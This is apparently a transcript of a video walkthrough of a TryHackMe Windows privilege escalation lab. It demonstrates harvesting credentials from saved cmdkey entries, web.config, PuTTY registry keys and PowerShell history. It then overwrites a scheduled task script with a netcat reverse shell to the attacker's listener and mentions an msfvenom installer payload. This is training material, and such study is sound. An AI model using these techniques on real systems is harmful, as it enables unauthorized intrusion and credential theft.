what's going on, guys? Welcome back. Today we are doing Windows privilege escalation. This is a continuation, of the junior pen testing path, and we're going to keep finishing it up. I know it's been a while since I posted on this, but there's just so much content out there that I'm trying to get to you guys as fast as I can. But we're going to go ahead and dive into it. So this is just Windows privilege escalation. So once we take over a Windows machine, so you can see we have this Windows machine here. It's very slow, and that's fine. So it might take us a little bit, and we're probably not going to get through all of it today because I want to make sure you guys understand. So we'll probably get to task 5 or 6, and then we'll stop there. So first things first, during a pen test, you will often have access to Windows hosts with an unprivileged user. This is true. So it's almost always going to be when you are on enterprise environment during pen testing, you're probably going to get a regular user account first. That's just the way it is because, I mean, if you think about it, statistically speaking, the majority of users on a network are regular unprivileged users. So statistically, you're most likely to get them. So just think of it that way. Yes, by all means, if you can get an admin account right off the bat, go for it. Don't waste your time with all this, but that's not realistic to do in every situation. You need to know how to do this. So unprivileged users hold limited access, including files, folders, and no means perform admin tasks. True, but we can take advantage of what they do have access to get that admin permissions. So let's go ahead and dive into it. If you guys like this content, if you guys are enjoying the video, hit that like button, hit the sub button. Helps me tremendously grow, and I appreciate everything you guys do for me. So here we go. So simply put, privilege escalation, I'm not going to read the definition, but consists of using given access to a host with user A. So basically what they're saying is I have access to user A, and now I can gain access to user B, which has higher permissions, right? So that would be an admin in this case, or that's what the goal is, right? The long-term goal or the overall goal is a domain admin, but we don't need to dive too deep into that here. This is just privilege escalation. So gaining access to different accounts can be as simple as finding credentials in text files, spreadsheets. This is true. The one thing I don't think they cover very much, they don't cover service accounts, and service accounts usually have elevated privileges, at least for certain functions. And so I wish they covered it more, but those are something you should look for when you're doing a pen test. Always, always, always is service accounts, because they are very hard to rotate passwords, for one. For two, they also typically have, like I said, have elevated privileges, at least for that function that it's doing. And then for three, it's less likely that people are going to be weirded out by that service account logging into other machines, because it is a service account. If you're not familiar with what a service account is, basically it's an account that you use to run a service on a machine. So if I needed to connect this machine over to this machine and I need to do it regularly using an application or something, I will use a service account. So that way it's not logging in using my account, it's not logging in using your account, it's using an account specific to that service. So gaining access to different accounts can be as simple as finding them in a text file, which is true. It's actually not uncommon. Misconfigurations on services or scheduled tasks. That's how these are the ones we're going to abuse. Excessive privileges assigned to the account. Vulnerable software, which is always known. Missing Windows security patches also. So before jumping into the techniques, let's look at the different types of accounts. So you have your admins. This is your regular admin, right? Like, this has elevated privileges. They can change system configuration parameters and access files. So yeah, we know what an admin is. I don't need to explain it to you. Your standard users. These are people that can log into the machine and do standard activity. They can look at things, they can do stuff, but they can't do any admin tasks, okay? Any user with the administrator privileges will be part of the admin group. On the other hand, standard users are part of the user group. Keep in mind, what they're talking about here is not domain joined, meaning these are accounts that are just default on Windows. When you get into an enterprise level pen testing situation, what you're looking at is there will be multiple groups. It won't just be standard users, admins. There will be everything in between. There will be people with a lot of permissions, but they don't have admin, right? Those are still people that you want to get. Those are still targets, because they might have access to a lot more stuff, but they're just not considered a full admin. So keep that in mind, that when you need to learn Active Directory and users and groups, organizational units and everything like that, because that's where you start to see the elevated privileges, where you may not get a full domain admin, but you're still getting elevated privileges. Now, any user with administrative privileges will be in the administrator group, right? So these are local users. That's what we're talking about here, local. We're not talking about on a domain. In addition to that, you will usually hear about some special built-in accounts used by the operating system. Okay, so they are talking about, excuse me, here they are talking about domain joined. They just are only breaking them down as 2 types, which isn't the case. It, yeah, it's not the case because there will be everything in between that. There will be standard users that are maybe help desk that have elevated privileges. They can change things in Active Directory. That doesn't mean they're a full domain admin, right? So just keep that in mind. The local system accounts, these are accounts that are just local to the machine, meaning it can only log into that machine. It can't log into all the machines on the domain, but it has full access. So the system itself you'll see it all the time in the logs. The system itself will run when it's doing Windows tasks, right? When your system comes by default, it's going to have the system account and it's running all the time, right? That's just normal activity. That is, it's going to be using the system itself to run tasks, and that's the account it's using. The local service default account to run Windows services with minimum privileges. So this is if you need to run it without admin privileges, if you have a task that Windows needs to run but not run as admin. If you've ever ran something and it says like doesn't have permissions or something, and then you run it as admin and it works, that's the difference. Network service default account used for to Windows services with minimum privileges. It will use computer credentials. There you go. So it will use basically the account will use the computer's credentials to authenticate through a network. So pretty self-explanatory. Now, users that can change system configurations, that's admin. The system account has more privileges than administrator. User A or nay. I don't think A is, maybe that's just a UK thing, because I think TryHackMe's from UK, but I or nay, but anyway, so A, so yes, it does. And the reason is it's the system. It can do whatever it wants, right? It is the system. So that's why when you try to take over a machine, typically with like a interpreter shell or something, you want to get system access. Even if you have an admin account, system access always has more. Okay, so now harvesting passwords from usual spots. So this is where you're gonna, this is where you're gonna look for, and this is the machine that started right here. So, okay, unattended Windows installation. When installing, and this actually is very common, but you guys have to, if you never worked in an enterprise environment or any network environment like this, then this might be foreign to you. When installing Windows on a large number of hosts, admins use Windows deployment services. Okay, so they put an image out there, right? And that image sits out there, and when it does, they basically say, hey, image this machine or image all these machines with a new image or whatever, and it has that image sitting out there where it can grab it, right? That's the whole point. So, which allows for single operating system image to be deployed through several hosts. So you can store this image, it knows where to reach them, everybody can grab them, and it will start installing the image. If you don't know when I say image, because I know that's some of you it may be new to you, that means the security posture, the way Windows is set up. If you set up Windows in a specific way, meaning you download it, you have all your applications for your company, you have all of your different local admin accounts that you need, you have your break glass accounts, those types of things, you have everything set up the way you want. You then take a snapshot, an image of that, and you say, this is how I want every machine set up. And then you can push that to everybody. That's what they're doing here. Now, these kinds of installations are referring to unattended installations, meaning nobody's sitting there doing anything. The user doesn't have to log in. You can just push this to people, right? Or you can have it set up, and then when you plug a new computer in and join the domain, it will pull that image. Okay, such installations require the use of an admin account, which is true, which might end up being stored in the machine in the following locations. So you can see unattended XML, Panther unattended, System32, sysprep, The reason these are stored there is because it has to use admin credentials, and this is unattended, meaning I don't want to have to type in my credentials every time for every person. So I store them so it can go grab them later, right? So as part of these files, you might encounter these. So you can actually go look for these if you have access to that machine. Pretty interesting. It's a pretty good way to look for it, especially if you know the machine has been sysprepped. That's what it's called. Sysprep is when you're imaging the machine. When I say that, it means you're grabbing that snapshot. Okay, whenever a user runs a command using PowerShell, it gets stored into a file that keeps memory. This is a history file, right? Bash has the same thing. You can type history on Bash, and you can see they're going to go ahead and do this. The reason they do this, that you look for the history, is because there's a lot of times when running commands that you have to put your credentials in to run that command on another machine or something, and if you don't hide it, meaning you don't have it as a secure credential or something like that, it will just show it. It'll display it. Okay, saved Windows credentials keys. Windows allows users to use other users' credentials, which we know. This function also gives option to save these credentials on the system. So command key list will actually do that. So what that means is you can save credentials so that you can run, like let's say you had a service account and you need to run a task as that service. You can save those credentials. Well, here you can list them. Well, you can't actually see the passwords. If you notice the credentials worth trying, if you notice any credentials worth trying, excuse me, you can use them with run as command and save cred options. So what that means is here you won't see the credential. Like you'll see the username, but you won't see the password. But if you know Windows, you can run as. What that means is I can run the command as the user that they said I have in question. So I'll show you what I mean. So I haven't done this box in a long time, so I don't remember, but if they actually have one here, but we'll try and make this a little bit bigger for you guys. That way you can see it. We'll make it 36 and see if that's too big. Okay, so what we're gonna do is we're gonna type cmd key list and see if there is a list of keys. Currently stored credentials, it looks like we have user w privilege escalation mic.cats. So what we could do is we could say run as save cred, right? And then we could say user, and that user would be this w priv escalation 1, and we'd say, and you may not have to put the domain there, so mic.cats, and it should so we're gonna run cmd.exe, and look at that. So we actually ran a new command shell, and you can see up here running as mic.cats. So I'm actually able to run now a shell as this new user because they saved the credential there. So that's actually pretty interesting. So that's one way to look for credentials as well. IAS configurations. If you don't know what IAS is, if you've heard of Apache, anything like that, IAS is the way that Microsoft runs their web servers. So it's a web server is all it is. But you can see Internet Information Services is the default web server. The configuration of the IAS is stored on a file called web.config. So if you can find that web.config, it can store passwords for that database and configured authentication mechanisms, meaning there might be service accounts in there. So you can see here, here's a quick way to find database connection strings on the file. So one thing to keep in mind that I see all the time with people that do CTFs is they run into this situation where they think that I have to go straight here to admin. What you can do and what you should be doing is looking at doing things like running this command, for instance, starting up a command.exe, right, using mic.cats. Well, mic.cats might have more permissions than we do. We might not have had permissions to access the IIS file, but now we might have permissions to access that IIS file. So now we can do this, and I don't know if this is actually, if they have it on this machine or not, but why is this not, okay, so it didn't copy and paste, but so then you would run the type command, right? And we'd say type C Windows Microsoft.net framework 64. Let's see. Yep, it does actually have it. So version 4.3319 config web. And if little trick, if you don't know if something exists, just try and tab it, and if it finishes it, you know you're good. And then you just say find string and connection string, and we hit enter. Do the same thing, and I think you have to capitalize the S and see if it finds it. Okay, and there it found it, right? So you can see here's the user ID and here's the password. So we actually were able to pull the IIS configuration. But the key here is you may have to pivot through a lot of accounts to get different permissions, right? To gather different things. So if there's an IIS server, maybe I can't grab the IIS logs. Maybe I don't have permission to access those. But We then use the saved credentials, Mike Katz. We then can access the IIS credentials and things like that. So make sure you're pivoting around and messing with it. Don't just think you have to go from here to here, right? It's not a straight jump all the time. Okay, so now you can retrieve credentials from software, from PuTTY. So PuTTY is an SSH client, and you can see here what they're doing is they're querying the registry, and they're asking for the software, PuTTY, and they're looking at the sessions. So what they're doing is, and we'll just do it again with Mike Katz. Actually, we'll do it with the regular so you can see it because I made it bigger. They're just saying, okay, registry, we want to query the registry, and we want to say H key. If you didn't know, the registry is basically every file in the system. It's kind of like how Linux, how Linux, everything's a file. Windows is the same way, just it's a registry key. And it's got a binary 1 or 0, true or false. Okay, PuTTY sessions F, and we'll say proxy. So we're looking for the proxy S. All right, we hit enter, and you can see we're getting the PuTTY sessions. And look, one of them's called my SSH server. When we do that, look at the name, Tom Smith. Cool Pass 2021. So right away we've gotten Mike Katz's account. We've got this one here. We ended up getting the one for IIS as well. So we've gotten a bunch of usernames just from kind of changing our tactics around, right? Now, a password for the Julia.Jones user has been left on the PowerShell history. What is the password? So let's go back and let's look at what here we go, console history. So we need to go and get the history. So we say, okay, type, and type just opens a file. So if you're wondering, we say type, and we say user profile, and we're going to say app data, roaming, Microsoft. Let's see, did I mess something up? Because it's not tabbing, but that's all right. User profile, nope, should be good. Microsoft, Windows, PowerShell, PS, read line, console, host, history.txt. Change that. See, even though actually Windows is not case sensitive, and you can see here's the last things ran on PowerShell. Well, we ran ls, who am I priv, who am I groups, and you can see they added a user on the domain controller named Julia Jones, password supercretpass. Okay, so we say supercretpass, boom, we got past it. Okay, so now we say a web server is running on the remote host. Find any interesting passwords on the web config file. Well, we already did that. We did that in Mike Katz one, so that's why I'm not going to do it again, but we did that on Mike Katz already. So we got that password, and then there is a saved password on your Windows credentials, excuse me, using command key and run as spawn a shell for Mike Katz and retrieve. Okay, so we already did that. So now we just got to retrieve the flag from his desktop because we're not able to access that without it. So now we say cd, and we'll go c users Mike Katz desktop, and then we say dir because there's no ls, which is kind of funny that there was no ls. It says it's not recognized, but then the history shows that there was ls ran. That's kind of actually funny. I just thought about that. And then we say type flag.txt, then thm, what is my password? There it is. So you can see the first one is PowerShell is ls on the history, which is kind of funny, like I said, because ls is not part of it supposedly, but that's because this version just doesn't have it. Okay, but I guess, okay, never mind, I correct myself because this is the PowerShell history. I'm using command prompt. That's on me. I wasn't paying attention. All right, so now let's retrieve the password stored in the saved PuTTY session. Well, we just did that too, and that's right here, Cool Pass 2021. All right, so let's keep going. So now we've got other quick wins. So now scheduled tasks. So this is actually something that you should be doing on Windows, Linux, everything, looking at scheduled tasks. So we're going to say scheduled tasks query, and what these are is they are just tasks that someone scheduled and said, hey, I want these to basically run at whatever time I tell it, or however often I tell it, or whatever, right? So we want to say, okay, we need to get a list of the scheduled tasks, right? But we don't want to search through all of them. So we're looking, and it looks like it's at system startup for one, but you can see we already knew the name. The name of it was Vuln task, so that's why we put Vuln task in there. We searched for Vuln task, so it's kind of cheating because we knew the name of it, and you would have to look normally, but we're looking and we're trying to see what kind of users can we get, right? Scheduled tasks can be listed from the command line. Okay, you'll get lots of information about the task. For us, the task to run parameters, which indicates what gets executed by the scheduled task. So this is what's important. You see how it says C task scheduled task.bat. That's a batch file. If we can manipulate that file, if we can edit it, then when the scheduled task runs, it runs our file, whatever we want, right? So that's one way to elevate privileges right there. And you can see it starts at system startup. So if we could get this to run, right, we could, or if we could edit that, we could edit it, and you notice it runs as admin. We could edit that to, instead of do whatever it does now, do a reverse shell to us, restart the system, and it would automatically connect to us every time it restarted, and nobody would know, right? Now, there might be some detection that pops up, but still. Okay, so now you can see if our current user can modify or overwrite the task, yep, and you can see here we have to check permissions. So we use, and you can see we use iCalcs, which is, I believe, part of the sysinternal suite, but I could be wrong on that. It might just be default. So now you say tasks, and we already know the path, right? Because it just gave it to us. So it's scheduled task.bat. Okay, and you can see NT authority system. Okay, so right here, built-in users has I and F, and you can see here F has full access. So that means we have full access to it. So this means we can modify it. So we could easily say we want it to be a netcat shell, and then we want it to, and then we could just start the system, and then boom. Because if you notice, it runs as an administrator, we now have administrator access. So that's how you do that. And you can see here, all you have to do is say echo C tools, because they've already added netcat on here, and command.exe, and they're saying run the scheduled task for us. Or they're saying, I'm sorry, no, they're not. They're saying echo this as the actual script, and then let's see what the task says. Does it need to do it? Yeah, I think we do need to actually do it. So let's go ahead and do this one. So we're just gonna say same exact thing, echo, because that's just we're gonna edit it, right? We're gonna say C tools, and if you don't know, Windows is not case sensitive, so don't stress about the case sensitivity. exe tech e cmd.exe. So all we're doing is saying netcat run and execute command.exe, and then our IP address is right here. Just open this up, get the IP 10.10.45.84, 10.10.45.84, 10.10.45.84, 10.10.45.84, and then we'll say, where was it? There we go. We're going to use the same port 4444 just because we know it's not in use, but normally I wouldn't use that because that's the default interpreter port, and that will be blocked by most companies. Tasks, scheduled task, .bat, sch task.bat. Okay, so we should be able to, here we're actually completely overwriting it. Okay, so now we have to go back here. We have to start up a netcat listener. So we'll say netcat lvmp 4444. Okay, so now that's listening. Now we just go back here and we have to run the new scheduled task that we just created. Or we didn't create a new one, excuse me, the one we edited. So scheduled tasks, run, and then it's called Vuln task. So we run it, attempted to run, it says successful, but it says attempted. Okay, and look at that. We have a shell and we have a full elevated permission. So who am I? Why does that look weird? that looks weird. I don't know why it looked weird the first time. So you can see here, we're task user 1. Okay, interesting. The reason that's interesting is because I actually thought we would get full admin permissions, but maybe I looked at it wrong. Okay, so task user 1 was expected. I wonder if I looked at it wrong. Maybe I didn't even notice that task user 1 was in the one running it. Oh, that's the author. I was looking at it wrong. Yep, that's the author. Task user 1 is who's running it. Okay, so that's on me. I looked at it wrong. But that's good. Good to know. So now we have this full shell, right? So now we can stay here, and now we have whatever we need, which is what is task user 1 flag. So we can say cd c users, and then cd task user 1, and then cd desktop, and then we can say cat flag.txt, and okay, type flag.txt, and thm task completed. There we go. So we actually did that task, no problem. Now here you can see how we're going to always stay elevated. So what they're doing is they're actually editing the registry, excuse me. So you can see this method requires 2 registry values to be set. So we need to set these. First we're querying them, right? And then we're actually creating a malicious.msi here. We're creating that MSF Venom reverse shell. And then here we're actually putting it right in the temporary directory. You should also run the metasploit handler module configured accordingly. Once you have transferred the file you've created, you can run the installer with the command below and receive the reverse shell. So you can see this will actually go ahead and make sure that these are set. Now, does this work currently? I will tell you it probably won't because it will probably be busted. But there's ways around that. I'm just saying this is a good example of how to stay always elevated. You can change a registry, edit, you can make another scheduled task, you can do all kinds of things to stay elevated as that user once you have that user's configuration. All right, I was going to try to get to task 5, but I think we're going to stop there. Let's see how long. Well, yeah, it'll take us a little bit to get to task 5. Let's see. Yeah, this is a long one, so I'm going to stop there. That's a 30 minutes. That's good. We'll finish task 5, 6, 7, and then 8 next time, because then that's it. So tools of the trade, there's no actual questions, so that'll be it. So hopefully this helps you guys. Hopefully you guys are following along in this path, the junior pen testing path, and learning something, because a lot of these are very rudimentary and you might say they don't work anymore. They do. It's just you have to manipulate them in a way. You have to understand the technical aspects and understand that, yeah, it might not work where I run just that MSF Venom payload that they laid out for me, but if I can change things, I can make it work for me. So hopefully this helps you guys, and hopefully you guys like this path. Let me know if you do, and thank you. Have a good day.